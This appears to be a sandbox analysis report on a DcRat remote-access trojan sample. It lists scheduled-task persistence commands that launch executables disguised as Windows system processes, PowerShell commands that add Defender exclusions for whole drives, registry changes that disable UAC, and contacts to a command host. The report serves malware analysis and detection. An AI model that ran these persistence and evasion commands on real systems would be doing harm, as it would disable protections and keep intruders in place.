schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac82" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac82" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Java\jdk1.7.0_80\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Java\jdk1.7.0_80\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Program Files\Java\jdk1.7.0_80\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\MSOCache\All Users\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Windows\SoftwareDistribution\DataStore\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\DataStore\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\DataStore\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Mail\fr-FR\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\fr-FR\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Mail\fr-FR\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\SendTo\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Admin\SendTo\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\SendTo\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Adobe\Updater6\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Updater6\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Adobe\Updater6\taskhost.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6eb7dc68-3b56-4104-8492-15fd7469c7f3.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\872ca587-b503-40a7-a7e8-a0ec98bc2b7b.vbs"

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a4254bd3-725a-4097-83ab-caf4b342bb22.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\75126c4d-4415-4941-a7af-6220b54e4f05.vbs"

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c99bb55e-d369-46c0-bbd3-885f2cdc68ce.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\500b6a95-69a2-43d4-84a4-56733331fc39.vbs"

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2a934ab6-a0be-45da-9120-2ecfbd65a366.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\37391401-52e6-4435-8f98-a72a90dcefdd.vbs"

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d371ec06-88b8-4b79-83dd-f9b9e83bab5c.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2c590d8-e616-4064-9d48-984d30f16e36.vbs"

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11c3c6e3-e37d-45ad-b327-36b9310f5414.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6eee1b04-c6b7-4099-aa33-70c37ba7f555.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 a0887556.xsph.ru udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp

Files

C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\smss.exe

MD5 a785b1ff3467b61f4506c7022ad13e31
SHA1 9f76c04963f2de14f4aaa13dcf9af98f79f89a91
SHA256 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8
SHA512 ca56b31a25b23de63fc7131788c350f0081c5673fc7456781a93f2ec9852948d5500e5fd06c30924dd6614e7bc2a1bc9346f02e067a06bb4b26c96f70f6ad0c9

C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe

MD5 5f79b5b49f38267a4a858ce0c2c44464
SHA1 99246d2d0af48e3a355c8685acbc24edaae9c6ab
SHA256 e3aaa06dcbb63eec2f23ea859584f5e31a5a4c0d12298a8164bad01a175e2b33
SHA512 2a19ad94554fbd59b12fb58e46f3dab04294b4a1f16413d4b3cb2998708459dc8b547cdef20b38bf94d23ffb26806300486bbd3eba970459976c5776bf2098d4

C:\Program Files\Windows Journal\it-IT\csrss.exe

MD5 acc2bbc77b63d4f95be5d48018c688a1
SHA1 86d3bb175d5c4c728bd7378751d2df53ede609d7
SHA256 c1d0f028f948af197fd55ead074e5c0bb3bfb3548373507a6bb9e3a038d52468
SHA512 e713ac4ef6ef17509a65c1d1835884581523d18b3cac3226e2d6c9595e08fd72f374f9a4e1bb0411ad3f62998ad0ab5d37847cbea1e8a7cbfc3ef3246b8e1c77

C:\MSOCache\All Users\lsass.exe

MD5 ff6dba90af15cea2ed595f7577d4a0db
SHA1 e267723591b77e3edeee90f1831e9ce3a88719aa
SHA256 37d074384ebc304b9a60d2f4cd95940d4672a0cbf214509cc3fd97ac41d1205b
SHA512 ce8551d6aa501b03ce604e6f49c18464b33d3527a04f25c451148fe7a89489a51f86befc4461f536737d63720cc73915e3116fb0308ec8e0f2e4181ccdfd5f14

C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe

MD5 6cbc93df87d1d7f0b1e841c277236322
SHA1 aaefa814e47d232f3be96fe54fdee219b30058ac
SHA256 605028478feda1d12eec2368e572e0734a0ce9cb4098192df83a7d276f049157
SHA512 82812a8c6208a468eae95bee40115cc47f1e7b179e499473b07c0e95be0acdafa491c01b084a5e4f640994aaef4fecc50d9c5bcab569bea5654f0b4441b10a18

C:\ProgramData\Adobe\Updater6\RCX5382.tmp

MD5 156c1ed17902262eeb68d4f521ea30c2
SHA1 7c7607cc05aaede848712b5c8457ed2c5730b0e4
SHA256 c5c60e427260a41cc5043ee2f96397c122f22fdb4cb42cc7bbb758929ab0d6a2
SHA512 545d97f8024ad14e74136f213265df2ec17a194b9a741020ed44dfb75b1d21f5c2aa4e5ec2238ae0b5ab39866eac55d77c0384ec74c59eaa1ce92985842b4564

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d3713000e5a79148493d20ab3b7428eb
SHA1 29819bcb2aa915f8aed9296c7197cd41f5e6f678
SHA256 3d7e547587e51f9caf93d1bd627fbed612d2c9f42dc350bdf9b724e17b7606e5
SHA512 8c9354bd76889270c1ab5bd32c6bb5209ae62085217946c40ef894bec0dd37ae7995624759749d3a6be4c8e30a1cdac160577fdce57a2e5d51e3b24172c29301

C:\Users\Admin\AppData\Local\Temp\6eb7dc68-3b56-4104-8492-15fd7469c7f3.vbs

MD5 790fe28488bb6aeb0f38dfe07abf7f04
SHA1 81b74339f0a3c7263096e54b73d404fd3e192a9f
SHA256 9de7ed22e30bc0bf034380b21f8975bb2ee088d8d12c20e5a9a30dd7bcece0e7
SHA512 25b4f77b681da79ea7e24ebf4e45a5f4db7cade86ac685d5e0396d484992f7eac220e255586506af35268069ebb215db4729bfd8a653654c6696d30b62d9077e

C:\Users\Admin\AppData\Local\Temp\872ca587-b503-40a7-a7e8-a0ec98bc2b7b.vbs

MD5 e01269bef8d7bdb82a6b0f155fec4216
SHA1 bc1db2a55f38b9a2c9c4842be570a2c0b802480b
SHA256 f07b4f58044dadce241a7ab7e826eb06aeb5a263d52fe4f4a399e8589169aca0
SHA512 58d3e0dcfcbdf0a43858a52094f48d54e119c965d6d26a58dc0fa36a7e28a1e99007051943940db90822318aa945d363a66f7cef3cc306b9b72efbc4283b6970

C:\Users\Admin\AppData\Local\Temp\a4254bd3-725a-4097-83ab-caf4b342bb22.vbs

MD5 11b813f842b0adf6c935fb693b24d2c2
SHA1 99a36391822ee739cf1be0e9188208979aee9600
SHA256 5cf601945bc5927d8a90a0eb3aa7fa8aec8fd4b2594c1db91966abf6acf17944
SHA512 2194fe9f63c4e774117f945823fb66838feb86dcf9927d3e5767802f5554bd925d05e63613eec8d36f504673e6c0e559ad8692978d186d8d6d54ba9bb6cee209

C:\Users\Admin\AppData\Local\Temp\c99bb55e-d369-46c0-bbd3-885f2cdc68ce.vbs

MD5 0dcdeef3c74b8e2e8564eba824b6f633
SHA1 11541689002b1c4430a90f356798c85d2bc2fc38
SHA256 d9a95ef860f80109e1cc06c430d349bb92687e270b4d67f9c8827a1a599adf35
SHA512 f87ad4bebe31ee17ac413d91753076d3df020daef7145e1118b26facd1075898b4238356fe955e41bf85914e0806dc227cc5ae07eb823940e99f478b01f168f7

C:\Users\Admin\AppData\Local\Temp\2a934ab6-a0be-45da-9120-2ecfbd65a366.vbs

MD5 19e6ea6c538bb6ef26dbcc1fc4deb6fd
SHA1 3e1623ff1ea6ec7fe345e737119bc37ae1de7105
SHA256 b02d61dcc070c4d068ac0ca56f1c6b574a0882134a7d9850dc3a7037757bcc6e
SHA512 77e056bbfe9a183d05d936fd71766a1ccd44fa48489cd7333060a4b31aae99662467377765482351b679232a1a1f4ee82281b3f19d713dd4872c9cee8c5c1ad5

C:\Users\Admin\AppData\Local\Temp\d371ec06-88b8-4b79-83dd-f9b9e83bab5c.vbs

MD5 8f7d1eaa33c20fa7aeb539cd8bc4b28a
SHA1 2e7aa689d009d1193eef7ee1b9fb7e1b9a1433e7
SHA256 4ec1156d7ede90720d1183d47f09388951e78b31448a91b729c0d814b600e429
SHA512 701a7db13cd5eccc715c4b1d01972b3f6844cf5e25e8ea9061536d98b3e8b73891ae07237f036a3ddae18be61b5494ed9e2e7354f7b79d390901abd6608e8d99

C:\Users\Admin\AppData\Local\Temp\11c3c6e3-e37d-45ad-b327-36b9310f5414.vbs

MD5 81020c333b0367427390dd0a7b56b7e9
SHA1 220363d0a2f4fed62373ba7058ea9a4b8ef0f112
SHA256 0a95432c3fc2d7d91227193eb0d43d827921311f68a90548fc41ff884a5f9d60
SHA512 9ea21aec0fb6bb337570f2acdedc9c3e84ace5fe2b1e63ee99a2a192c2ffa9fff86aa08fbee38c846eb4ba4eb9c9bc6fb17bbfa958dee67cf3ae5c3b5cc7109a

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 19:47

Reported

2024-05-31 19:50

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Detects executables packed with SmartAssembly

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Default User\services.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Internet Explorer\RCX582B.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Windows Portable Devices\explorer.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Portable Devices\explorer.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Internet Explorer\lsass.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Portable Devices\RCX51EB.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Portable Devices\RCX51FB.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Windows Portable Devices\7a0fd90576e088 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Internet Explorer\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\RCX582A.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\lsass.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Users\Default User\services.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\services.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 600 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
